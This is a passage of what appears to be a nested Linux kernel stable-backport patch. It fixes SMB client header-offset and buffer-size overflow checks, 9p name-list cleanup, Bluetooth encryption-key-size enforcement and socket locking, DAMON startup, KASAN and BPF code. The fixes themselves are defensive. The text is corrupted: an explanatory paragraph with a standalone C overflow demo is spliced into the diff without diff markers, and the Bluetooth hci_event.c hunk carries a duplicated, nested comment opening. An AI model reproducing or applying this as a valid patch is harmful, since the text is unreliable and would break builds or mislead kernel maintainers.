++			 server->ops->calc_smb_size(smb));
++	}
+ #endif /* CONFIG_CIFS_DEBUG2 */
+ }
+ 
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+index 2e814eadd6aef..512ac9dea9787 100644
+--- a/fs/smb/client/cifsglob.h
++++ b/fs/smb/client/cifsglob.h
+@@ -513,7 +513,8 @@ struct smb_version_operations {
+ 				 struct mid_q_entry **, char **, int *);
+ 	enum securityEnum (*select_sectype)(struct TCP_Server_Info *,
+ 			    enum securityEnum);
+-	int (*next_header)(char *);
++	int (*next_header)(struct TCP_Server_Info *server, char *buf,
++			   unsigned int *noff);
+ 	/* ioctl passthrough for query_info */
+ 	int (*ioctl_query_info)(const unsigned int xid,
+ 				struct cifs_tcon *tcon,
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index 5b19918938346..f725a119ce312 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -1225,7 +1225,12 @@ next_pdu:
+ 		server->total_read += length;
+ 
+ 		if (server->ops->next_header) {
+-			next_offset = server->ops->next_header(buf);
++			if (server->ops->next_header(server, buf, &next_offset)) {
++				cifs_dbg(VFS, "%s: malformed response (next_offset=%u)\n",
++					 __func__, next_offset);
++				cifs_reconnect(server, true);
++				continue;
++			}
+ 			if (next_offset)
+ 				server->pdu_size = next_offset;
+ 		}
+diff --git a/fs/smb/client/misc.c b/fs/smb/client/misc.c
+index 31e06133acc3d..41290c12d0bcc 100644
+--- a/fs/smb/client/misc.c
++++ b/fs/smb/client/misc.c
+@@ -350,6 +350,10 @@ checkSMB(char *buf, unsigned int total_read, struct TCP_Server_Info *server)
+ 			cifs_dbg(VFS, "Length less than smb header size\n");
+ 		}
+ 		return -EIO;
++	} else if (total_read < sizeof(*smb) + 2 * smb->WordCount) {
++		cifs_dbg(VFS, "%s: can't read BCC due to invalid WordCount(%u)\n",
++			 __func__, smb->WordCount);
++		return -EIO;
+ 	}
+ 
+ 	/* otherwise, there is enough to get to the BCC */
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index 1b3489a2f0db7..df03d80ab6d5f 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -5196,17 +5196,22 @@ smb3_handle_read_data(struct TCP_Server_Info *server, struct mid_q_entry *mid)
+ 				NULL, 0, 0, false);
+ }
+ 
+-static int
+-smb2_next_header(char *buf)
++static int smb2_next_header(struct TCP_Server_Info *server, char *buf,
++			    unsigned int *noff)
+ {
+ 	struct smb2_hdr *hdr = (struct smb2_hdr *)buf;
+ 	struct smb2_transform_hdr *t_hdr = (struct smb2_transform_hdr *)buf;
+ 
+-	if (hdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM)
+-		return sizeof(struct smb2_transform_hdr) +
+-		  le32_to_cpu(t_hdr->OriginalMessageSize);
+-
+-	return le32_to_cpu(hdr->NextCommand);
++	if (hdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM) {
++		*noff = le32_to_cpu(t_hdr->OriginalMessageSize);
++		if (unlikely(check_add_overflow(*noff, sizeof(*t_hdr), noff)))
++			return -EINVAL;
++	} else {
++		*noff = le32_to_cpu(hdr->NextCommand);
++	}
++	if (unlikely(*noff && *noff < MID_HEADER_SIZE(server)))
++		return -EINVAL;
++	return 0;
+ }
+ 
+ static int
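smb2_next_header() now validates what it returns: the transform-header size is added with check_add_overflow() so a hostile OriginalMessageSize cannot wrap the offset, and any nonzero offset smaller than one message header is rejected before the read loop in connect.c trusts it (which then forces a reconnect). check_add_overflow() maps onto the compiler builtin, so the check is easy to demonstrate standalone (sizes below are illustrative):

    #include <stdio.h>

    int main(void)
    {
        unsigned int noff;
        unsigned int hdr_size = 52;          /* transform header, for example */
        unsigned int orig = 0xFFFFFFF0u;     /* hostile message size */

        if (__builtin_add_overflow(orig, hdr_size, &noff))
            printf("reject: next offset would wrap\n");
        else if (noff && noff < 64)          /* smaller than one header */
            printf("reject: offset lands inside the current header\n");
        else
            printf("next pdu at %u\n", noff);
        return 0;
    }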
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index 847d69d327c2a..05ff8a457a3d7 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -372,10 +372,15 @@ static int __smb2_plain_req_init(__le16 smb2_command, struct cifs_tcon *tcon,
+ 				 void **request_buf, unsigned int *total_len)
+ {
+ 	/* BB eventually switch this to SMB2 specific small buf size */
+-	if (smb2_command == SMB2_SET_INFO)
++	switch (smb2_command) {
++	case SMB2_SET_INFO:
++	case SMB2_QUERY_INFO:
+ 		*request_buf = cifs_buf_get();
+-	else
++		break;
++	default:
+ 		*request_buf = cifs_small_buf_get();
++		break;
++	}
+ 	if (*request_buf == NULL) {
+ 		/* BB should we add a retry in here if not a writepage? */
+ 		return -ENOMEM;
+@@ -3523,8 +3528,13 @@ SMB2_query_info_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
+ 	struct smb2_query_info_req *req;
+ 	struct kvec *iov = rqst->rq_iov;
+ 	unsigned int total_len;
++	size_t len;
+ 	int rc;
+ 
++	if (unlikely(check_add_overflow(input_len, sizeof(*req), &len) ||
++		     len > CIFSMaxBufSize))
++		return -EINVAL;
++
+ 	rc = smb2_plain_req_init(SMB2_QUERY_INFO, tcon, server,
+ 				 (void **) &req, &total_len);
+ 	if (rc)
+@@ -3546,7 +3556,7 @@ SMB2_query_info_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
+ 
+ 	iov[0].iov_base = (char *)req;
+ 	/* 1 for Buffer */
+-	iov[0].iov_len = total_len - 1 + input_len;
++	iov[0].iov_len = len;
+ 	return 0;
+ }
+ 
+@@ -3554,7 +3564,7 @@ void
+ SMB2_query_info_free(struct smb_rqst *rqst)
+ {
+ 	if (rqst && rqst->rq_iov)
+-		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
++		cifs_buf_release(rqst->rq_iov[0].iov_base); /* request */
+ }
+ 
+ static int
+@@ -5439,6 +5449,11 @@ build_qfs_info_req(struct kvec *iov, struct cifs_tcon *tcon,
+ 	return 0;
+ }
+ 
++static inline void free_qfs_info_req(struct kvec *iov)
++{
++	cifs_buf_release(iov->iov_base);
++}
++
+ int
+ SMB311_posix_qfs_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 	      u64 persistent_fid, u64 volatile_fid, struct kstatfs *fsdata)
+@@ -5470,7 +5485,7 @@ SMB311_posix_qfs_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	rc = cifs_send_recv(xid, ses, server,
+ 			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	cifs_small_buf_release(iov.iov_base);
++	free_qfs_info_req(&iov);
+ 	if (rc) {
+ 		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
+ 		goto posix_qfsinf_exit;
+@@ -5521,7 +5536,7 @@ SMB2_QFS_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	rc = cifs_send_recv(xid, ses, server,
+ 			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	cifs_small_buf_release(iov.iov_base);
++	free_qfs_info_req(&iov);
+ 	if (rc) {
+ 		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
+ 		goto qfsinf_exit;
+@@ -5588,7 +5603,7 @@ SMB2_QFS_attr(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	rc = cifs_send_recv(xid, ses, server,
+ 			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	cifs_small_buf_release(iov.iov_base);
++	free_qfs_info_req(&iov);
+ 	if (rc) {
+ 		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
+ 		goto qfsattr_exit;
+diff --git a/fs/ubifs/tnc.c b/fs/ubifs/tnc.c
+index 6b7d95b65f4b6..f4728e65d1bda 100644
+--- a/fs/ubifs/tnc.c
++++ b/fs/ubifs/tnc.c
+@@ -65,6 +65,7 @@ static void do_insert_old_idx(struct ubifs_info *c,
+ 		else {
+ 			ubifs_err(c, "old idx added twice!");
+ 			kfree(old_idx);
++			return;
+ 		}
+ 	}
+ 	rb_link_node(&old_idx->rb, parent, p);
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index 1fba826f0acef..3ce9e39ecdb85 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -2681,6 +2681,9 @@ enum bpf_text_poke_type {
+ int bpf_arch_text_poke(void *ip, enum bpf_text_poke_type t,
+ 		       void *addr1, void *addr2);
+ 
++void bpf_arch_poke_desc_update(struct bpf_jit_poke_descriptor *poke,
++			       struct bpf_prog *new, struct bpf_prog *old);
++
+ void *bpf_arch_text_copy(void *dst, void *src, size_t len);
+ int bpf_arch_text_invalidate(void *dst, size_t len);
+ 
+diff --git a/include/linux/damon.h b/include/linux/damon.h
+index b13be7ae2275e..e6941b239f449 100644
+--- a/include/linux/damon.h
++++ b/include/linux/damon.h
+@@ -8,6 +8,7 @@
+ #ifndef _DAMON_H_
+ #define _DAMON_H_
+ 
++#include <linux/completion.h>
+ #include <linux/mutex.h>
+ #include <linux/time64.h>
+ #include <linux/types.h>
+@@ -452,6 +453,8 @@ struct damon_ctx {
+ /* private: internal use only */
+ 	struct timespec64 last_aggregation;
+ 	struct timespec64 last_ops_update;
++	/* for waiting until the execution of the kdamond_fn is started */
++	struct completion kdamond_started;
+ 
+ /* public: */
+ 	struct task_struct *kdamond;
+diff --git a/include/linux/dm-bufio.h b/include/linux/dm-bufio.h
+index 1262d92ab88fc..2e71ca35942e9 100644
+--- a/include/linux/dm-bufio.h
++++ b/include/linux/dm-bufio.h
+@@ -37,6 +37,8 @@ dm_bufio_client_create(struct block_device *bdev, unsigned int block_size,
+  */
+ void dm_bufio_client_destroy(struct dm_bufio_client *c);
+ 
++void dm_bufio_client_reset(struct dm_bufio_client *c);
++
+ /*
+  * Set the sector range.
+  * When this function is called, there must be no I/O in progress on the bufio
+diff --git a/include/linux/kasan.h b/include/linux/kasan.h
+index 6e6f0238d63cc..4603e6e30c0ea 100644
+--- a/include/linux/kasan.h
++++ b/include/linux/kasan.h
+@@ -471,10 +471,10 @@ static inline void kasan_free_module_shadow(const struct vm_struct *vm) {}
+ 
+ #endif /* (CONFIG_KASAN_GENERIC || CONFIG_KASAN_SW_TAGS) && !CONFIG_KASAN_VMALLOC */
+ 
+-#ifdef CONFIG_KASAN
++#if defined(CONFIG_KASAN_GENERIC) || defined(CONFIG_KASAN_SW_TAGS)
+ void kasan_non_canonical_hook(unsigned long addr);
+-#else /* CONFIG_KASAN */
++#else /* CONFIG_KASAN_GENERIC || CONFIG_KASAN_SW_TAGS */
+ static inline void kasan_non_canonical_hook(unsigned long addr) { }
+-#endif /* CONFIG_KASAN */
++#endif /* CONFIG_KASAN_GENERIC || CONFIG_KASAN_SW_TAGS */
+ 
+ #endif /* LINUX_KASAN_H */
+diff --git a/include/linux/key-type.h b/include/linux/key-type.h
+index 7d985a1dfe4af..5caf3ce823733 100644
+--- a/include/linux/key-type.h
++++ b/include/linux/key-type.h
+@@ -73,6 +73,7 @@ struct key_type {
+ 
+ 	unsigned int flags;
+ #define KEY_TYPE_NET_DOMAIN	0x00000001 /* Keys of this type have a net namespace domain */
++#define KEY_TYPE_INSTANT_REAP	0x00000002 /* Keys of this type don't have a delay after expiring */
+ 
+ 	/* vet a description */
+ 	int (*vet_description)(const char *description);
+diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h
+index 3660ce6a93496..93ec34a94b724 100644
+--- a/include/linux/mlx5/driver.h
++++ b/include/linux/mlx5/driver.h
+@@ -282,18 +282,23 @@ struct mlx5_cmd_stats {
+ struct mlx5_cmd {
+ 	struct mlx5_nb    nb;
+ 
++	/* members which needs to be queried or reinitialized each reload */
++	struct {
++		u16		cmdif_rev;
++		u8		log_sz;
++		u8		log_stride;
++		int		max_reg_cmds;
++		unsigned long	bitmask;
++		struct semaphore sem;
++		struct semaphore pages_sem;
++		struct semaphore throttle_sem;
++	} vars;
+ 	enum mlx5_cmdif_state	state;
+ 	void	       *cmd_alloc_buf;
+ 	dma_addr_t	alloc_dma;
+ 	int		alloc_size;
+ 	void	       *cmd_buf;
+ 	dma_addr_t	dma;
+-	u16		cmdif_rev;
+-	u8		log_sz;
+-	u8		log_stride;
+-	int		max_reg_cmds;
+-	int		events;
+-	u32 __iomem    *vector;
+ 
+ 	/* protect command queue allocations
+ 	 */
+@@ -303,11 +308,8 @@ struct mlx5_cmd {
+ 	 */
+ 	spinlock_t	token_lock;
+ 	u8		token;
+-	unsigned long	bitmask;
+ 	char		wq_name[MLX5_CMD_WQ_MAX_NAME];
+ 	struct workqueue_struct *wq;
+-	struct semaphore sem;
+-	struct semaphore pages_sem;
+ 	int	mode;
+ 	u16     allowed_opcode;
+ 	struct mlx5_cmd_work_ent *ent_arr[MLX5_MAX_COMMANDS];
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index 583aebd8c1e01..5f8a534b65746 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -187,6 +187,7 @@ struct blocked_key {
+ struct smp_csrk {
+ 	bdaddr_t bdaddr;
+ 	u8 bdaddr_type;
++	u8 link_type;
+ 	u8 type;
+ 	u8 val[16];
+ };
+@@ -196,6 +197,7 @@ struct smp_ltk {
+ 	struct rcu_head rcu;
+ 	bdaddr_t bdaddr;
+ 	u8 bdaddr_type;
++	u8 link_type;
+ 	u8 authenticated;
+ 	u8 type;
+ 	u8 enc_size;
+@@ -210,6 +212,7 @@ struct smp_irk {
+ 	bdaddr_t rpa;
+ 	bdaddr_t bdaddr;
+ 	u8 addr_type;
++	u8 link_type;
+ 	u8 val[16];
+ };
+ 
+@@ -217,6 +220,8 @@ struct link_key {
+ 	struct list_head list;
+ 	struct rcu_head rcu;
+ 	bdaddr_t bdaddr;
++	u8 bdaddr_type;
++	u8 link_type;
+ 	u8 type;
+ 	u8 val[HCI_LINK_KEY_SIZE];
+ 	u8 pin_len;
+diff --git a/include/trace/events/9p.h b/include/trace/events/9p.h
+index 4dfa6d7f83baa..cd104a1343e2d 100644
+--- a/include/trace/events/9p.h
++++ b/include/trace/events/9p.h
+@@ -178,18 +178,21 @@ TRACE_EVENT(9p_protocol_dump,
+ 		    __field(	void *,		clnt				)
+ 		    __field(	__u8,		type				)
+ 		    __field(	__u16,		tag				)
+-		    __array(	unsigned char,	line,	P9_PROTO_DUMP_SZ	)
++		    __dynamic_array(unsigned char, line,
++				min_t(size_t, pdu->capacity, P9_PROTO_DUMP_SZ))
+ 		    ),
+ 
+ 	    TP_fast_assign(
+ 		    __entry->clnt   =  clnt;
+ 		    __entry->type   =  pdu->id;
+ 		    __entry->tag    =  pdu->tag;
+-		    memcpy(__entry->line, pdu->sdata, P9_PROTO_DUMP_SZ);
++		    memcpy(__get_dynamic_array(line), pdu->sdata,
++				__get_dynamic_array_len(line));
+ 		    ),
+-	    TP_printk("clnt %lu %s(tag = %d)\n%.3x: %16ph\n%.3x: %16ph\n",
++	    TP_printk("clnt %lu %s(tag = %d)\n%*ph\n",
+ 		      (unsigned long)__entry->clnt, show_9p_op(__entry->type),
+-		      __entry->tag, 0, __entry->line, 16, __entry->line + 16)
++		      __entry->tag, __get_dynamic_array_len(line),
++		      __get_dynamic_array(line))
+  );
+ 
+ 
+diff --git a/kernel/bpf/arraymap.c b/kernel/bpf/arraymap.c
+index 832b2659e96e2..00f23febb9a7d 100644
+--- a/kernel/bpf/arraymap.c
++++ b/kernel/bpf/arraymap.c
+@@ -997,11 +997,16 @@ static void prog_array_map_poke_untrack(struct bpf_map *map,
+ 	mutex_unlock(&aux->poke_mutex);
+ }
+ 
++void __weak bpf_arch_poke_desc_update(struct bpf_jit_poke_descriptor *poke,
++				      struct bpf_prog *new, struct bpf_prog *old)
++{
++	WARN_ON_ONCE(1);
++}
++
+ static void prog_array_map_poke_run(struct bpf_map *map, u32 key,
+ 				    struct bpf_prog *old,
+ 				    struct bpf_prog *new)
+ {
+-	u8 *old_addr, *new_addr, *old_bypass_addr;
+ 	struct prog_poke_elem *elem;
+ 	struct bpf_array_aux *aux;
+ 
+@@ -1010,7 +1015,7 @@ static void prog_array_map_poke_run(struct bpf_map *map, u32 key,
+ 
+ 	list_for_each_entry(elem, &aux->poke_progs, list) {
+ 		struct bpf_jit_poke_descriptor *poke;
+-		int i, ret;
++		int i;
+ 
+ 		for (i = 0; i < elem->aux->size_poke_tab; i++) {
+ 			poke = &elem->aux->poke_tab[i];
+@@ -1029,21 +1034,10 @@ static void prog_array_map_poke_run(struct bpf_map *map, u32 key,
+ 			 *    activated, so tail call updates can arrive from here
+ 			 *    while JIT is still finishing its final fixup for
+ 			 *    non-activated poke entries.
+-			 * 3) On program teardown, the program's kallsym entry gets
+-			 *    removed out of RCU callback, but we can only untrack
+-			 *    from sleepable context, therefore bpf_arch_text_poke()
+-			 *    might not see that this is in BPF text section and
+-			 *    bails out with -EINVAL. As these are unreachable since
+-			 *    RCU grace period already passed, we simply skip them.
+-			 * 4) Also programs reaching refcount of zero while patching
++			 * 3) Also programs reaching refcount of zero while patching
+ 			 *    is in progress is okay since we're protected under
+ 			 *    poke_mutex and untrack the programs before the JIT
+-			 *    buffer is freed. When we're still in the middle of
+-			 *    patching and suddenly kallsyms entry of the program
+-			 *    gets evicted, we just skip the rest which is fine due
+-			 *    to point 3).
+-			 * 5) Any other error happening below from bpf_arch_text_poke()
+-			 *    is a unexpected bug.
++			 *    buffer is freed.
+ 			 */
+ 			if (!READ_ONCE(poke->tailcall_target_stable))
+ 				continue;
+@@ -1053,39 +1047,7 @@ static void prog_array_map_poke_run(struct bpf_map *map, u32 key,
+ 			    poke->tail_call.key != key)
+ 				continue;
+ 
+-			old_bypass_addr = old ? NULL : poke->bypass_addr;
+-			old_addr = old ? (u8 *)old->bpf_func + poke->adj_off : NULL;
+-			new_addr = new ? (u8 *)new->bpf_func + poke->adj_off : NULL;
+-
+-			if (new) {
+-				ret = bpf_arch_text_poke(poke->tailcall_target,
+-							 BPF_MOD_JUMP,
+-							 old_addr, new_addr);
+-				BUG_ON(ret < 0 && ret != -EINVAL);
+-				if (!old) {
+-					ret = bpf_arch_text_poke(poke->tailcall_bypass,
+-								 BPF_MOD_JUMP,
+-								 poke->bypass_addr,
+-								 NULL);
+-					BUG_ON(ret < 0 && ret != -EINVAL);
+-				}
+-			} else {
+-				ret = bpf_arch_text_poke(poke->tailcall_bypass,
+-							 BPF_MOD_JUMP,
+-							 old_bypass_addr,
+-							 poke->bypass_addr);
+-				BUG_ON(ret < 0 && ret != -EINVAL);
+-				/* let other CPUs finish the execution of program
+-				 * so that it will not possible to expose them
+-				 * to invalid nop, stack unwind, nop state
+-				 */
+-				if (!ret)
+-					synchronize_rcu();
+-				ret = bpf_arch_text_poke(poke->tailcall_target,
+-							 BPF_MOD_JUMP,
+-							 old_addr, NULL);
+-				BUG_ON(ret < 0 && ret != -EINVAL);
+-			}
++			bpf_arch_poke_desc_update(poke, new, old);
+ 		}
+ 	}
+ }
+diff --git a/kernel/trace/synth_event_gen_test.c b/kernel/trace/synth_event_gen_test.c
+index 8d77526892f45..d944924cd1e1c 100644
+--- a/kernel/trace/synth_event_gen_test.c
++++ b/kernel/trace/synth_event_gen_test.c
+@@ -477,6 +477,17 @@ static int __init synth_event_gen_test_init(void)
+ 
+ 	ret = test_trace_synth_event();
+ 	WARN_ON(ret);
++
++	/* Disable when done */
++	trace_array_set_clr_event(gen_synth_test->tr,
++				  "synthetic",
++				  "gen_synth_test", false);
++	trace_array_set_clr_event(empty_synth_test->tr,
++				  "synthetic",
++				  "empty_synth_test", false);
++	trace_array_set_clr_event(create_synth_test->tr,
++				  "synthetic",
++				  "create_synth_test", false);
+  out:
+ 	return ret;
+ }
+diff --git a/lib/vsprintf.c b/lib/vsprintf.c
+index 24f37bab8bc1f..fa1c197018551 100644
+--- a/lib/vsprintf.c
++++ b/lib/vsprintf.c
+@@ -2092,15 +2092,20 @@ char *fwnode_full_name_string(struct fwnode_handle *fwnode, char *buf,
+ 
+ 	/* Loop starting from the root node to the current node. */
+ 	for (depth = fwnode_count_parents(fwnode); depth >= 0; depth--) {
+-		struct fwnode_handle *__fwnode =
+-			fwnode_get_nth_parent(fwnode, depth);
++		/*
++		 * Only get a reference for other nodes (i.e. parent nodes).
++		 * fwnode refcount may be 0 here.
++		 */
++		struct fwnode_handle *__fwnode = depth ?
++			fwnode_get_nth_parent(fwnode, depth) : fwnode;
+ 
+ 		buf = string(buf, end, fwnode_get_name_prefix(__fwnode),
+ 			     default_str_spec);
+ 		buf = string(buf, end, fwnode_get_name(__fwnode),
+ 			     default_str_spec);
+ 
+-		fwnode_handle_put(__fwnode);
++		if (depth)
++			fwnode_handle_put(__fwnode);
+ 	}
+ 
+ 	return buf;
+diff --git a/mm/damon/core.c b/mm/damon/core.c
+index 36d098d06c558..5db9bec8ae67c 100644
+--- a/mm/damon/core.c
++++ b/mm/damon/core.c
+@@ -383,6 +383,8 @@ struct damon_ctx *damon_new_ctx(void)
+ 	if (!ctx)
+ 		return NULL;
+ 
++	init_completion(&ctx->kdamond_started);
++
+ 	ctx->attrs.sample_interval = 5 * 1000;
+ 	ctx->attrs.aggr_interval = 100 * 1000;
+ 	ctx->attrs.ops_update_interval = 60 * 1000 * 1000;
+@@ -519,11 +521,14 @@ static int __damon_start(struct damon_ctx *ctx)
+ 	mutex_lock(&ctx->kdamond_lock);
+ 	if (!ctx->kdamond) {
+ 		err = 0;
++		reinit_completion(&ctx->kdamond_started);
+ 		ctx->kdamond = kthread_run(kdamond_fn, ctx, "kdamond.%d",
+ 				nr_running_ctxs);
+ 		if (IS_ERR(ctx->kdamond)) {
+ 			err = PTR_ERR(ctx->kdamond);
+ 			ctx->kdamond = NULL;
++		} else {
++			wait_for_completion(&ctx->kdamond_started);
+ 		}
+ 	}
+ 	mutex_unlock(&ctx->kdamond_lock);
+@@ -1147,6 +1152,8 @@ static int kdamond_fn(void *data)
+ 
+ 	pr_debug("kdamond (%d) starts\n", current->pid);
+ 
++	complete(&ctx->kdamond_started);
++
+ 	if (ctx->ops.init)
+ 		ctx->ops.init(ctx);
+ 	if (ctx->callback.before_start && ctx->callback.before_start(ctx))
+diff --git a/mm/kasan/report.c b/mm/kasan/report.c
+index 66a37f177d231..5d9ae80df4954 100644
+--- a/mm/kasan/report.c
++++ b/mm/kasan/report.c
+@@ -523,8 +523,9 @@ void kasan_report_async(void)
+ }
+ #endif /* CONFIG_KASAN_HW_TAGS */
+ 
++#if defined(CONFIG_KASAN_GENERIC) || defined(CONFIG_KASAN_SW_TAGS)
+ /*
+- * With CONFIG_KASAN, accesses to bogus pointers (outside the high
++ * With CONFIG_KASAN_INLINE, accesses to bogus pointers (outside the high
+  * canonical half of the address space) cause out-of-bounds shadow memory reads
+  * before the actual access. For addresses in the low canonical half of the
+  * address space, as well as most non-canonical addresses, that out-of-bounds
+@@ -560,3 +561,4 @@ void kasan_non_canonical_hook(unsigned long addr)
+ 	pr_alert("KASAN: %s in range [0x%016lx-0x%016lx]\n", bug_type,
+ 		 orig_addr, orig_addr + KASAN_GRANULE_SIZE - 1);
+ }
++#endif
+diff --git a/net/8021q/vlan_core.c b/net/8021q/vlan_core.c
+index 0beb44f2fe1f0..f001582345052 100644
+--- a/net/8021q/vlan_core.c
++++ b/net/8021q/vlan_core.c
+@@ -407,6 +407,8 @@ int vlan_vids_add_by_dev(struct net_device *dev,
+ 		return 0;
+ 
+ 	list_for_each_entry(vid_info, &vlan_info->vid_list, list) {
++		if (!vlan_hw_filter_capable(by_dev, vid_info->proto))
++			continue;
+ 		err = vlan_vid_add(dev, vid_info->proto, vid_info->vid);
+ 		if (err)
+ 			goto unwind;
+@@ -417,6 +419,8 @@ unwind:
+ 	list_for_each_entry_continue_reverse(vid_info,
+ 					     &vlan_info->vid_list,
+ 					     list) {
++		if (!vlan_hw_filter_capable(by_dev, vid_info->proto))
++			continue;
+ 		vlan_vid_del(dev, vid_info->proto, vid_info->vid);
+ 	}
+ 
+@@ -436,8 +440,11 @@ void vlan_vids_del_by_dev(struct net_device *dev,
+ 	if (!vlan_info)
+ 		return;
+ 
+-	list_for_each_entry(vid_info, &vlan_info->vid_list, list)
++	list_for_each_entry(vid_info, &vlan_info->vid_list, list) {
++		if (!vlan_hw_filter_capable(by_dev, vid_info->proto))
++			continue;
+ 		vlan_vid_del(dev, vid_info->proto, vid_info->vid);
++	}
+ }
+ EXPORT_SYMBOL(vlan_vids_del_by_dev);
+ 
+diff --git a/net/9p/protocol.c b/net/9p/protocol.c
+index 4e3a2a1ffcb3f..0e6603b1ec906 100644
+--- a/net/9p/protocol.c
++++ b/net/9p/protocol.c
+@@ -394,6 +394,8 @@ p9pdu_vreadf(struct p9_fcall *pdu, int proto_version, const char *fmt,
+ 				uint16_t *nwname = va_arg(ap, uint16_t *);
+ 				char ***wnames = va_arg(ap, char ***);
+ 
++				*wnames = NULL;
++
+ 				errcode = p9pdu_readf(pdu, proto_version,
+ 								"w", nwname);
+ 				if (!errcode) {
+@@ -403,6 +405,8 @@ p9pdu_vreadf(struct p9_fcall *pdu, int proto_version, const char *fmt,
+ 							  GFP_NOFS);
+ 					if (!*wnames)
+ 						errcode = -ENOMEM;
++					else
++						(*wnames)[0] = NULL;
+ 				}
+ 
+ 				if (!errcode) {
+@@ -414,8 +418,10 @@ p9pdu_vreadf(struct p9_fcall *pdu, int proto_version, const char *fmt,
+ 								proto_version,
+ 								"s",
+ 								&(*wnames)[i]);
+-						if (errcode)
++						if (errcode) {
++							(*wnames)[i] = NULL;
+ 							break;
++						}
+ 					}
+ 				}
+ 
+@@ -423,11 +429,14 @@ p9pdu_vreadf(struct p9_fcall *pdu, int proto_version, const char *fmt,
+ 					if (*wnames) {
+ 						int i;
+ 
+-						for (i = 0; i < *nwname; i++)
++						for (i = 0; i < *nwname; i++) {
++							if (!(*wnames)[i])
++								break;
+ 							kfree((*wnames)[i]);
++						}
++						kfree(*wnames);
++						*wnames = NULL;
+ 					}
+-					kfree(*wnames);
+-					*wnames = NULL;
+ 				}
+ 			}
+ 			break;
+diff --git a/net/bluetooth/af_bluetooth.c b/net/bluetooth/af_bluetooth.c
+index 1c3c7ff5c3c66..f1b7510359e4b 100644
+--- a/net/bluetooth/af_bluetooth.c
++++ b/net/bluetooth/af_bluetooth.c
+@@ -264,11 +264,14 @@ int bt_sock_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 	if (flags & MSG_OOB)
+ 		return -EOPNOTSUPP;
+ 
++	lock_sock(sk);
++
+ 	skb = skb_recv_datagram(sk, flags, &err);
+ 	if (!skb) {
+ 		if (sk->sk_shutdown & RCV_SHUTDOWN)
+-			return 0;
++			err = 0;
+ 
++		release_sock(sk);
+ 		return err;
+ 	}
+ 
+@@ -294,6 +297,8 @@ int bt_sock_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 
+ 	skb_free_datagram(sk, skb);
+ 
++	release_sock(sk);
++
+ 	if (flags & MSG_TRUNC)
+ 		copied = skblen;
+ 
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index c86a45344fe28..dcb13c64e8e7c 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -515,6 +515,9 @@ static u8 hci_cc_read_class_of_dev(struct hci_dev *hdev, void *data,
+ {
+ 	struct hci_rp_read_class_of_dev *rp = data;
+ 
++	if (WARN_ON(!hdev))
++		return HCI_ERROR_UNSPECIFIED;
++
+ 	bt_dev_dbg(hdev, "status 0x%2.2x", rp->status);
+ 
+ 	if (rp->status)
+@@ -746,9 +749,23 @@ static u8 hci_cc_read_enc_key_size(struct hci_dev *hdev, void *data,
+ 	} else {
+ 		conn->enc_key_size = rp->key_size;
+ 		status = 0;
++
++		if (conn->enc_key_size < hdev->min_enc_key_size) {
++			/* As slave role, the conn->state has been set to
++			/* In the slave role, conn->state has been set to
++			 * BT_CONNECTED and the l2cap conn req might not be
++			 * received yet; at this moment the l2cap layer does
++			 * almost nothing with the non-zero status.
++			 * handler of l2cap conn req will get the right secure
++			 * state at a later time.
++			 */
++			status = HCI_ERROR_AUTH_FAILURE;
++			clear_bit(HCI_CONN_ENCRYPT, &conn->flags);
++			clear_bit(HCI_CONN_AES_CCM, &conn->flags);
++		}
+ 	}
+ 
+-	hci_encrypt_cfm(conn, 0);
++	hci_encrypt_cfm(conn, status);
+ 
+ done:
+ 	hci_dev_unlock(hdev);
+@@ -2298,7 +2315,8 @@ static void hci_cs_inquiry(struct hci_dev *hdev, __u8 status)
+ 		return;
+ 	}
+ 
+-	set_bit(HCI_INQUIRY, &hdev->flags);
++	if (hci_sent_cmd_data(hdev, HCI_OP_INQUIRY))
++		set_bit(HCI_INQUIRY, &hdev->flags);
+ }
+ 
+ static void hci_cs_create_conn(struct hci_dev *hdev, __u8 status)
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index a7899857aee5d..4c5793053393f 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -6493,6 +6493,14 @@ drop:
+ 	kfree_skb(skb);
+ }
+ 
++static inline void l2cap_sig_send_rej(struct l2cap_conn *conn, u16 ident)
++{
++	struct l2cap_cmd_rej_unk rej;
++
++	rej.reason = cpu_to_le16(L2CAP_REJ_NOT_UNDERSTOOD);
++	l2cap_send_cmd(conn, ident, L2CAP_COMMAND_REJ, sizeof(rej), &rej);
++}
++
